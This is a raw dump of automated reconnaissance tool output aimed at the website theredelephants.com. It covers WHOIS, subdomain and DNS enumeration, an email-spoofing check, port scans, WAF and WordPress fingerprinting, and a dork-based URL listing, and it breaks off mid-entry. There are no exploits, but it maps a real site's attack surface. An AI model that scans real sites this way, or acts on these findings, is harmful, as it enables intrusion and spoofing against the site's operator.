- Tech Street: 14455 N. Hayden Road
- Tech City: Scottsdale
- Tech State/Province: Arizona
- Tech Postal Code: 85260
- Tech Country: US
- Tech Phone: +1.4806242599
- Tech Phone Ext:
- Tech Fax: +1.4806242598
- Tech Fax Ext:
- Tech Email: theredelephants.com@domainsbyproxy.com
- Name Server: NS57.DOMAINCONTROL.COM
- Name Server: NS58.DOMAINCONTROL.COM
- DNSSEC: unsigned
- URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
- >>> Last update of WHOIS database: 2018-11-08T05:00:00Z <<<
- For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
- Notes:
- IMPORTANT: Port43 will provide the ICANN-required minimum data set per
- ICANN Temporary Specification, adopted 17 May 2018.
- Visit https://whois.godaddy.com to look up contact data for domains
- not covered by GDPR policy.
- The data contained in GoDaddy.com, LLC's WhoIs database,
- while believed by the company to be reliable, is provided "as is"
- with no guarantee or warranties regarding its accuracy. This
- information is provided for the sole purpose of assisting you
- in obtaining information about domain name registration records.
- Any use of this data for any other purpose is expressly forbidden without the prior written
- permission of GoDaddy.com, LLC. By submitting an inquiry,
- you agree to these terms of usage and limitations of warranty. In particular,
- you agree not to use this data to allow, enable, or otherwise make possible,
- dissemination or collection of this data, in part or in its entirety, for any
- purpose, such as the transmission of unsolicited advertising and
- and solicitations of any kind, including spam. You further agree
- not to use this data to enable high volume, automated or robotic electronic
- processes designed to collect or compile this data for any purpose,
- including mining this data for your own personal or commercial purposes.
- Please note: the registrant of the domain name is specified
- in the "registrant" section. In most cases, GoDaddy.com, LLC
- is not the registrant of domain names listed in this database.
- #######################################################################################################################################
- ____ _ _ _ _ _____
- [-] Enumerating subdomains now for theredelephants.com
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- SSL Certificates: shop.theredelephants.com
- Virustotal: shop.theredelephants.com
- Virustotal: www.theredelephants.com
- DNSdumpster: shop.theredelephants.com
- Bing: shop.theredelephants.com
- Google: shop.theredelephants.com
- [-] Saving results to file: /usr/share/sniper/loot/theredelephants.com/domains/domains-theredelephants.com.txt
- [-] Total Unique Subdomains Found: 2
- www.theredelephants.com
- shop.theredelephants.com
- #######################################################################################################################################
- ftp.theredelephants.com,104.196.67.80
- theredelephants.com,104.196.67.80
- www.theredelephants.com,104.196.67.80
- email.theredelephants.com,97.74.135.148,173.201.192.5,173.201.192.20,173.201.192.133,173.201.192.148,173.201.193.5,173.201.193.20,173.201.193.133,173.201.193.148,45.40.130.40,45.40.130.41,68.178.252.5,68.178.252.20,68.178.252.133,68.178.252.148,72.167.218.45,72.167.218.55,72.167.218.173,72.167.218.183,97.74.135.45,97.74.135.55,97.74.135.133
- #######################################################################################################################################
- [*] Processing domain theredelephants.com
- [+] Getting nameservers
- 173.201.76.29 - ns58.domaincontrol.com
- 216.69.185.29 - ns57.domaincontrol.com
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 include:spf.protection.outlook.com -all"
- "NETORGFT2476217.onmicrosoft.com"
- [+] MX records found, added to target list
- 0 theredelephants-com.mail.protection.outlook.com.
- [*] Scanning theredelephants.com for A records
- 104.196.67.80 - theredelephants.com
- 104.196.67.80 - ftp.theredelephants.com
- 104.196.67.80 - www.theredelephants.com
- 52.97.146.56 - autodiscover.theredelephants.com
- 52.97.146.40 - autodiscover.theredelephants.com
- 52.97.131.184 - autodiscover.theredelephants.com
- 52.97.130.8 - autodiscover.theredelephants.com
- 23.227.38.32 - shop.theredelephants.com
- 173.201.192.5 - email.theredelephants.com
- 173.201.193.148 - email.theredelephants.com
- 72.167.218.45 - email.theredelephants.com
- 97.74.135.45 - email.theredelephants.com
- 72.167.218.173 - email.theredelephants.com
- 97.74.135.148 - email.theredelephants.com
- 173.201.193.5 - email.theredelephants.com
- 97.74.135.133 - email.theredelephants.com
- 97.74.135.55 - email.theredelephants.com
- 72.167.218.55 - email.theredelephants.com
- 173.201.193.133 - email.theredelephants.com
- 45.40.130.40 - email.theredelephants.com
- 68.178.252.133 - email.theredelephants.com
- 45.40.130.41 - email.theredelephants.com
- 68.178.252.148 - email.theredelephants.com
- 68.178.252.20 - email.theredelephants.com
- 173.201.192.148 - email.theredelephants.com
- 173.201.193.20 - email.theredelephants.com
- 68.178.252.5 - email.theredelephants.com
- 72.167.218.183 - email.theredelephants.com
- 173.201.192.133 - email.theredelephants.com
- 173.201.192.20 - email.theredelephants.com
- 52.112.192.75 - sip.theredelephants.com
- 52.112.192.206 - lyncdiscover.theredelephants.com
- 104.41.216.18 - msoid.theredelephants.com
- 104.41.216.16 - msoid.theredelephants.com
- 40.112.64.25 - msoid.theredelephants.com
- ######################################################################################################################################
- [*] Found SPF record:
- [*] v=spf1 include:spf.protection.outlook.com -all
- [*] SPF record contains an All item: -all
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for theredelephants.com!
- #######################################################################################################################################
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ discover v0.5.0 - by @michenriksen
- Identifying nameservers for theredelephants.com... Done
- Using nameservers:
- - 173.201.76.29
- - 216.69.185.29
- Checking for wildcard DNS... Done
- Running collector: Threat Crowd... Done (0 hosts)
- Running collector: DNSDB... Error
- -> DNSDB returned unexpected response code: 503
- Running collector: Netcraft... Done (0 hosts)
- Running collector: PublicWWW... Done (0 hosts)
- Running collector: Censys... Skipped
- -> Key 'censys_secret' has not been set
- Running collector: Wayback Machine... Done (2 hosts)
- Running collector: PTRArchive... Error
- -> PTRArchive returned unexpected response code: 502
- Running collector: PassiveTotal... Skipped
- -> Key 'passivetotal_key' has not been set
- Running collector: Shodan... Skipped
- -> Key 'shodan' has not been set
- Running collector: Riddler... Skipped
- -> Key 'riddler_username' has not been set
- Running collector: VirusTotal... Skipped
- -> Key 'virustotal' has not been set
- Running collector: Dictionary... Done (0 hosts)
- Running collector: HackerTarget... Done (2 hosts)
- Running collector: Google Transparency Report... Done (1 host)
- Running collector: Certificate Search... Done (1 host)
- Resolving 2 unique hosts...
- 23.227.38.32 shop.theredelephants.com
- 104.196.67.80 theredelephants.com
- Found subnets:
- Wrote 2 hosts to:
- - file:///root/aquatone/theredelephants.com/hosts.txt
- - file:///root/aquatone/theredelephants.com/hosts.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ takeover v0.5.0 - by @michenriksen
- Loaded 2 hosts from /root/aquatone/theredelephants.com/hosts.json
- Loaded 25 domain takeover detectors
- Identifying nameservers for theredelephants.com... Done
- Using nameservers:
- - 173.201.76.29
- - 216.69.185.29
- Checking hosts for domain takeover vulnerabilities...
- Finished checking hosts:
- - Vulnerable : 0
- - Not Vulnerable : 2
- Wrote 0 potential subdomain takeovers to:
- - file:///root/aquatone/theredelephants.com/takeovers.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ scan v0.5.0 - by @michenriksen
- Loaded 2 hosts from /root/aquatone/theredelephants.com/hosts.json
- Probing 4 ports...
- 80/tcp 23.227.38.32 shop.theredelephants.com
- 80/tcp 104.196.67.80 theredelephants.com
- 443/tcp 23.227.38.32 shop.theredelephants.com
- 443/tcp 104.196.67.80 theredelephants.com
- Wrote open ports to file:///root/aquatone/theredelephants.com/open_ports.txt
- Wrote URLs to file:///root/aquatone/theredelephants.com/urls.txt
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ gather v0.5.0 - by @michenriksen
- Processing 4 pages...
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:10 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.17s latency).
- Not shown: 470 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 2222/tcp open EtherNetIP-1
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:11 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.12s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:11 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 118.89 ms 10.245.200.1
- 2 136.49 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 119.76 ms 195.42.145.65
- 4 127.17 ms 108.170.244.240
- 5 127.16 ms 72.14.238.53
- 6 202.30 ms 216.239.54.84
- 7 210.70 ms 209.85.255.252
- 8 210.73 ms 216.239.41.232
- 9 ... 17
- 18 209.82 ms 104.196.67.80
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:13 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 119.43 ms 10.245.200.1
- 2 130.20 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 120.20 ms 195.42.145.65
- 4 127.85 ms 108.170.244.240
- 5 137.10 ms 72.14.238.53
- 6 199.92 ms 216.239.54.84
- 7 211.76 ms 209.85.255.252
- 8 211.57 ms 216.239.41.232
- 9 ... 17
- 18 210.64 ms 104.196.67.80
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:16 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 119.89 ms 10.245.200.1
- 2 122.05 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 120.61 ms 195.42.145.65
- 4 128.11 ms 108.170.244.240
- 5 128.07 ms 72.14.238.53
- 6 200.32 ms 216.239.54.84
- 7 212.47 ms 209.85.255.252
- 8 211.90 ms 216.239.41.232
- 9 ... 17
- 18 209.79 ms 104.196.67.80
- ######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://theredelephants.com
- The site http://theredelephants.com is behind a ModSecurity (OWASP CRS)
- Number of requests: 13
- #######################################################################################################################################
- http://theredelephants.com [200 OK] Country[UNITED STATES][US], Email[contact@theredelephants.com], IP[104.196.67.80], JQuery[1.12.4], MetaGenerator[Powered by WPBakery Page Builder - drag and drop page builder for WordPress.], Open-Graph-Protocol[article], PoweredBy[WPBakery], Script[application/ld+json,text/javascript], Title[Home - The Red Elephants], UncommonHeaders[link,wpe-backend,x-cacheable,x-pass-why,x-cache-group,x-type], WordPress
- ######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://theredelephants.com...
- _______________________________ SITE INFO _______________________________
- IP Title
- 104.196.67.80 Home - The Red Elephants
- ________________________________ VERSION ________________________________
- Name Versions Type
- WordPress 4.9.8 CMS
- ______________________________ INTERESTING ______________________________
- URL Note Type
- /readme.html Readme file Interesting
- /robots.txt robots.txt index Interesting
- /login/ Login Page Interesting
- /test/ Test directory Interesting
- _________________________________ TOOLS _________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- _________________________________________________________________________
- Time: 75.4 sec Urls: 271 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Thu, 08 Nov 2018 05:20:59 GMT
- Content-Type: text/html; charset=UTF-8
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Pragma: no-cache
- Link: <http://theredelephants.com/wp-json/>; rel="https://api.w.org/"
- Link: <http://theredelephants.com/>; rel=shortlink
- WPE-Backend: apache
- X-Cacheable: SHORT
- Vary: Accept-Encoding,Cookie
- Cache-Control: max-age=600, must-revalidate
- X-Pass-Why:
- X-Cache-Group: normal
- X-Type: default
- Content-Encoding: gzip
- Connection: keep-alive
- ######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [08-11-2018 00:21:41]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-theredelephants.com.txt ]
- [ INFO ][ DORK ]::[ site:theredelephants.com ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.cz ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.my ID: 006688160405527839966:yhpefuwybre ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 0 / 100 ]-[00:21:52] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 1 / 100 ]-[00:21:54] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 2 / 100 ]-[00:21:56] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/caliguncontrol/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 3 / 100 ]-[00:21:58] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/detention/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 4 / 100 ]-[00:22:00] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/antifa/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 5 / 100 ]-[00:22:03] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/donkeys/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 6 / 100 ]-[00:22:06] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/terrorism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 7 / 100 ]-[00:22:08] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/columns/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 8 / 100 ]-[00:22:10] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/uncategorized/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 9 / 100 ]-[00:22:12] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/elections/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 10 / 100 ]-[00:22:15] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/liberals/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 11 / 100 ]-[00:22:17] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/trumpsupporters/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 12 / 100 ]-[00:22:19] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/terms/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 13 / 100 ]-[00:22:21] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/democrats/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 14 / 100 ]-[00:22:24] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/gop/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 15 / 100 ]-[00:22:26] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/isis/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 16 / 100 ]-[00:22:28] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/dnc/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 17 / 100 ]-[00:22:30] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/immigration/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 18 / 100 ]-[00:22:32] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/police/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 19 / 100 ]-[00:22:34] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/nationalsecurity/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 20 / 100 ]-[00:22:36] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/protesters/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 21 / 100 ]-[00:22:38] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/president/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 22 / 100 ]-[00:22:40] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/about/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 23 / 100 ]-[00:22:42] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/islam/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 24 / 100 ]-[00:22:44] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/cnn/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 25 / 100 ]-[00:22:46] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/obama/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 26 / 100 ]-[00:22:49] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/trump/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 27 / 100 ]-[00:22:51] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/russia/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 28 / 100 ]-[00:22:53] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/home/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 29 / 100 ]-[00:22:55] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/syria/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 30 / 100 ]-[00:22:57] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/congress/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 31 / 100 ]-[00:22:59] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/articles/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 32 / 100 ]-[00:23:01] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/economy/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 33 / 100 ]-[00:23:03] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/recount/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 34 / 100 ]-[00:23:05] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/healthcare/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 35 / 100 ]-[00:23:07] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/community/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 36 / 100 ]-[00:23:09] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/ice/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
